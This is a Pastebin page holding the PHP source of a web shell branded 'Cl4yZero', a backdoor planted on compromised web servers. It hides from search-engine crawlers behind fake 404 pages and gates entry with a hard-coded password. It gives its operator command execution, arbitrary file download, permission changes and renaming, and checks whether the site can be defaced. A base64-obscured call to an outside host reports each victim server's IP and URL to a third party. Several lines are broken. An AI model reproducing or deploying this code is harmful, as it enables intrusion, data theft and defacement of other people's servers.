Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function GetIP(){ if(getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP");
- } elseif(getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR");
- if (strstr($ip, ',')) { $tmp = explode (',', $ip);
- $ip = trim($tmp[0]);
- } } else { $ip = getenv("REMOTE_ADDR");
- } return $ip;
- } $x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
- if(function_exists('curl_init')) { $ch = @curl_init();
- curl_setopt($ch, CURLOPT_URL, $x);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- $gitt = curl_exec($ch);
- curl_close($ch);
- if($gitt == false){ @$gitt = file_get_contents($x);
- } }elseif(function_exists('file_get_contents')){ @$gitt = file_get_contents($x);
- }error_reporting(0);
- ob_start();
- set_time_limit(0);
- @define('VERSION', '2.1');
- $color = "#00ff00";
- $background_login = "http://shineindiafoundation.co.in/admin/event-img/658395.png";
- $background = "https://s-media-cache-ak0.pinimg.com/originals/68/a3/70/68a3704aa96f32671f5d692a3d8986aa.jpg";
- $defaceku1 =file_get_contents("https://pastebin.com/raw/q6imSeTB"); //Link SC depes.
- $defaceku2 =file_get_contents("https://pastebin.com/raw/q6imSeTB");
- $defaceku3 = file_get_contents("https://pastebin.com/raw/q6imSeTB");
- $fontcolor_global = 'white';
- $auth_pass = "8a6fb5b6c843ed48cf0c1b048120a48f"; // Ganti Password? Disini!
- // wearecl4y2018
- if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
- header("HTTP/1.0 404 Not Found");
- header("Status: 404 Not Found");
- die();
- }
- elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
- header("HTTP/1.0 404 Not Found");
- header("Status: 404 Not Found");
- die();
- }
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- session_start();
- function printLogin() {
- <style>input[type=password]{color:teal;background:black;border:1px solid teal}a{text-decoration:none;color:white;padding-left:270px}sad{font-family:'Fredericka the Great',cursive;color:teal;font-size:50px}</style>
- <title>:>Cl4yZero<:</title>
- <link rel="icon" type="image/png" href="http://downloadicons.net/sites/default/files/heartbreak-icon-85786.png">
- <body style="background-color:black;color:white">
- <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
- <center>
- global $background_login;
- _________________________________________________________________________________<br>
- Idiot BlackHat<br>
- <sad>Cl4yZero</sad><br>
- <iframe width="0" height="0" src="https://www.youtube.com/embed/a3sbfHu-6Fk?autoplay=1" frameborder="0" allowfullscreen></iframe>
- <img src="echo $background_login;" style="margin-left:65px">
- <form method=post>
- <br>
- <input type=password name=pass placeholder=./Password>
- </form>
- </center>
- </div>
- </center>
- exit; }
- function printLogin404(){
- header("HTTP/1.0 404 Not Found");
- header("Status: 404 Not Found");
- echo '
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server.</p>
- <hr>
- <address>Apache '.phpversion().' Server at '.$_SERVER['SERVER_NAME'].' Port 80</address>
- <style>input { margin:0;background-color:#fff;border:0px solid #fff; color:#fff; text-align:center;}</style>
- <form action="" method="post">
- <center><input type=password name="pass"></center>
- </body></html>
- </form>';
- }
- if( !isset( $_SESSION['login']))
- if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ){
- $_SESSION['login'] = true;
- header('Location: ?');
- }
- else{
- printLogin();
- }
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- if (isset($_GET["dl"]) && ($_GET["dl"] != "")) {
- $file = $_GET["dl"];
- $filez = @file_get_contents($file);
- header("Content-type: application/octet-stream");
- header("Content-length: " . strlen($filez));
- header("Content-disposition: attachment;filename='" . basename($file) . "';");
- echo $filez;
- exit;
- } elseif (isset($_GET["dlgzip"]) && ($_GET["dlgzip"] != "")) {
- $file = $_GET['dlgzip'];
- $filez = gzencode(@file_get_contents($file));
- header("Content-Type:application/x-gzip\n");
- header("Content-length: " . strlen($filez));
- header("Content-disposition: attachment;filename='" . basename($file) . ".gz';");
- echo $filez;
- exit;
- }
- if (isset($_GET["img"])) {
- @ob_clean();
- $d = magicboom($_GET["y"]);
- $f = $_GET["img"];
- $inf = @getimagesize($d . $f);
- $ext = explode($f, );
- $ext = $ext[count($ext) - 1];
- @header("Content-type: " . $inf["mime"]);
- @header("Cache-control: public");
- @header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
- @header("Cache-control: max-age=" . (60 * 60 * 24 * 7));
- @readfile($d . $f);
- exit;
- }
- $software = getenv("SERVER_SOFTWARE");
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
- $safemode = TRUE;
- else
- $safemode = FALSE;
- $system = @php_uname();
- if (strtolower(substr($system, 0, 3)) == "win")
- $win = TRUE;
- else
- $win = FALSE;
- if (isset($_GET['sad'])) {
- if (@is_dir($_GET['view'])) {
- $pwd = $_GET['view'];
- @chdir($pwd);
- } else {
- $pwd = $_GET['sad'];
- @chdir($pwd);
- }
- }
- if (!$win) {
- if (!$user = rapih(exe("whoami")))
- $user = "";
- if (!$id = rapih(exe("id")))
- $id = "";
- $prompt = $user . " \$ ";
- $pwd = @getcwd() . DIRECTORY_SEPARATOR;
- } else {
- $user = @get_current_user();
- $id = $user;
- $prompt = $user . " >";
- $pwd = realpath() . "\\";
- $v = explode("\\", $d);
- $v = $v[0];
- foreach (range("A", "Z") as $letter) {
- $bool = @is_dir($letter . ":\\");
- if ($bool) {
- $letters .= "<a href='?sad=" . $letter . ":\\'>[ ";
- if ($letter . ":" != $v) {
- $letters .= $letter;
- } else {
- $letters .= "<span class='gaya'>" . $letter . "</span>";
- }
- $letters .= " ]</a> ";
- }
- }
- }
- if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
- $posix = TRUE;
- else
- $posix = FALSE;
- $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
- $my_ip = $_SERVER['REMOTE_ADDR'];
- $bindport = "13123";
- $bindport_pass = "Krypton";
- $pwds = explode(DIRECTORY_SEPARATOR, $pwd);
- $pwdurl = "";
- for ($i = 0; $i < sizeof($pwds) - 1; $i++) {
- $pathz = "";
- for ($j = 0; $j <= $i; $j++) {
- $pathz .= $pwds[$j] . DIRECTORY_SEPARATOR;
- }
- $pwdurl .= "<a href='?sad=" . $pathz . "'>" . $pwds[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
- }
- if (isset($_POST['rename'])) {
- $old = $_POST['oldname'];
- $new = $_POST['newname'];
- @rename($pwd . $old, $pwd . $new);
- $file = $pwd . $new;
- }
- if (isset($_POST['chmod'])) {
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value) == 3) {
- $value = 0 . "" . $value;
- }
- @chmod($pwd . $name, octdec($value));
- $file = $pwd . $name;
- }
- if (isset($_POST['chmod_folder'])) {
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value) == 3) {
- $value = 0 . "" . $value;
- }
- @chmod($pwd . $name, octdec($value));
- $file = $pwd . $name;
- }
- $buff = " " . $software . "<br>";
- $buff .= " " . $system . "<br>";
- if ($id != "")
- $buff .= " " . $id . "<br>";
- if ($safemode)
- $buff .= " safemode : <b><font style='color:#DD4736'>ON</font></b><br>";
- else
- $buff .= " safemode : <b><font style='color:#00FF00'>OFF</font></b><br>";
- function showstat($stat)
- {
- if ($stat == "on") {
- return "<b><font style='color:lime'>ON</font></b>";
- } else {
- return "<b><font style='color:red'>OFF</font></b>";
- }
- }
- function hdd($s) {
- if($s >= 1073741824)
- return sprintf('%1.2f',$s / 1073741824 ).' GB';
- elseif($s >= 1048576)
- return sprintf('%1.2f',$s / 1048576 ) .' MB';
- elseif($s >= 1024)
- return sprintf('%1.2f',$s / 1024 ) .' KB';
- else
- return $s .' B';
- }
- function testmysql()
- {
- if (function_exists('mysql_connect')) {
- return showstat("on");
- } else {
- return showstat("off");
- }
- }
- function testcurl()
- {
- if (function_exists('curl_version')) {
- return showstat("on");
- } else {
- return showstat("off");
- }
- }
- function testwget()
- {
- if (exe('wget --help')) {
- return showstat("on");
- } else {
- return showstat("off");
- }
- }
- function testperl()
- {
- if (exe('perl -h')) {
- return showstat("on");
- } else {
- return showstat("off");
- }
- }
- function ngindex($piye)
- {
- if ($piye == "ok") {
- return "<font style='color:lime'>Writeable (Bisa Tebas Index)</font>";
- } else {
- return "<b><font style='color:red'>Not Writeable</font></b>";
- }
- }
- function can_deface(){
- $thisdir = $_SERVER['DOCUMENT_ROOT'];
- if (is_writable($thisdir)) {
- return ' Writeable Root Directory:<font color="green" size="+1">'.$thisdir.' '.ngindex("ok").'<br>';
- } else {
- return ngindex("ok").'<br>';
- }
- }
- $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
- if(!function_exists('posix_getegid')) {
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- } else {
- $uid = @posix_getpwuid(posix_geteuid());
- $gid = @posix_getgrgid(posix_getegid());
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- }
- $buff .= " MySQL: " . testmysql() . " | Perl: " . testperl() . " | cURL: " . testcurl() . " | WGet: " . testwget() . "<br>";
- $buff .= " Disk Size:<font style='color:lime'>".hdd(disk_free_space("/"))."</font>/".hdd(disk_total_space("/"))."<br>";
- $buff .= can_deface();
- $buff .= " Disable Function :$show_ds<br>";
- $buff .= " Drives : " . $letters . " > " . $pwdurl;
- function rapih($text)
- {
- return trim(str_replace("<br>", "", $text));
- }
- function magicboom($text)
- {
- if (!get_magic_quotes_gpc()) {
- return $text;
- }
- return stripslashes($text);
- }
- function showdir($pwd, $prompt)
- {
- $fname = array();
- $dname = array();
- if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
- $posix = TRUE;
- else
- $posix = FALSE;
- $user = "????:????";
- if ($dh = opendir($pwd)) {
- while ($file = readdir($dh)) {
- if (is_dir($file)) {
- $dname[] = $file;
- } elseif (is_file($file)) {
- $fname[] = $file;
- }
- }
- closedir($dh);
- }
- sort($fname);
- sort($dname);
- $path = @explode(DIRECTORY_SEPARATOR, $pwd);
- $tree = @sizeof($path);
- $parent = "";
- $buff = " <form action='?sad=" . $pwd . "&x=shell' method='post' style='margin:8px 0 0 0;'><table class='cmdbox' style='width:50%;'><tr><td>$prompt</td><td><input onMouseOver='this.focus();' id='cmd' class='inputz' type='text' name='cmd' style='width:400px;' value='' /><input class='inputzbut' type='submit' value='Do !' name='submitcmd' style='width:80px;' /></td></tr></form><form action='?' method='get' style='margin:8px 0 0 0;'><input type='hidden' name='y' value='" . $pwd . "' /><tr><td>view file/folder</td><center><td><input onMouseOver='this.focus();' id='goto' class='inputz' type='text' name='view' style='width:400px;' value='" . $pwd . "' /><input class='inputzbut' type='submit' value='view !' name='submitcmd' style='width:80px;' /></td></center></tr></form></table><table class='explore'> <tr><th>File & Dirs</th><th style='width:80px;'>Size</th><th style='width:210px;'>Owner:Group</th><th style='width:80px;'>perms</th><th style='width:110px;'>Last Modified</th><th style='width:190px;'>actions</th></tr> ";
- if ($tree > 2)
- for ($i = 0; $i < $tree - 2; $i++)
- $parent .= $path[$i] . DIRECTORY_SEPARATOR;
- else
- $parent = $pwd;
- foreach ($dname as $folder) {
- if ($folder == ) {
- if (!$win && $posix) {
- $name = @posix_getpwuid(@fileowner($folder));
- $group = @posix_getgrgid(@filegroup($folder));
- $owner = $name['name'] . "<span class='gaya'> : </span>" . $group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr><td><a href=\"?sad=" . $pwd . "\">$folder</a></td><td>-</td>
- <td style=\"text-align:center;\">" . $owner . "</td>
- <td><center>" . get_perms($pwd) . "</center></td>
- <td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\">
- <a href=\"?sad=$pwd&edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
- </span><form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
- </form></td></tr> ";
- } elseif ($folder == "..") {
- if (!$win && $posix) {
- $name = @posix_getpwuid(@fileowner($folder));
- $group = @posix_getgrgid(@filegroup($folder));
- $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr><td>
- <a href=\"?sad=" . $parent . "\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>-</td>
- <td style=\"text-align:center;\">" . $owner . "</td>
- <td><center>" . get_perms($parent) . "</center></td> <td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td>
- <td><span id=\"titik2\"><a href=\"?sad=$pwd&edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
- <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
- </form></td></tr>";
- } else {
- if (!$win && $posix) {
- $name = @posix_getpwuid(@fileowner($folder));
- $group = @posix_getgrgid(@filegroup($folder));
- $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
- } else {
- $owner = $user;
- }
- $buff .= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?sad=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\"><img src='data:image/png;base64,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' width=20px/> <font style='color:red;text-shadow:none;'>[</font> $folder <font style='color:red;text-shadow:none;'>]</font></a>
- <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" />
- </form> </td><td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td><center>
- <a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form3');\">" . get_perms($pwd . $folder) . "</a>
- <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($folder) . "_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"" . substr(sprintf('%o', fileperms($pwd . $folder)), -4) . "\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form3');\" /></form></center></td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a>| <a href=\"?sad=$pwd&fdelete=" . $pwd . $folder . "\">delete</a>
- </td>
- </tr>";
- }
- }
- foreach ($fname as $file) {
- $full = $pwd . $file;
- if (!$win && $posix) {
- $name = @posix_getpwuid(@fileowner($file));
- $group = @posix_getgrgid(@filegroup($file));
- $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
- } else {
- $owner = $user;
- }
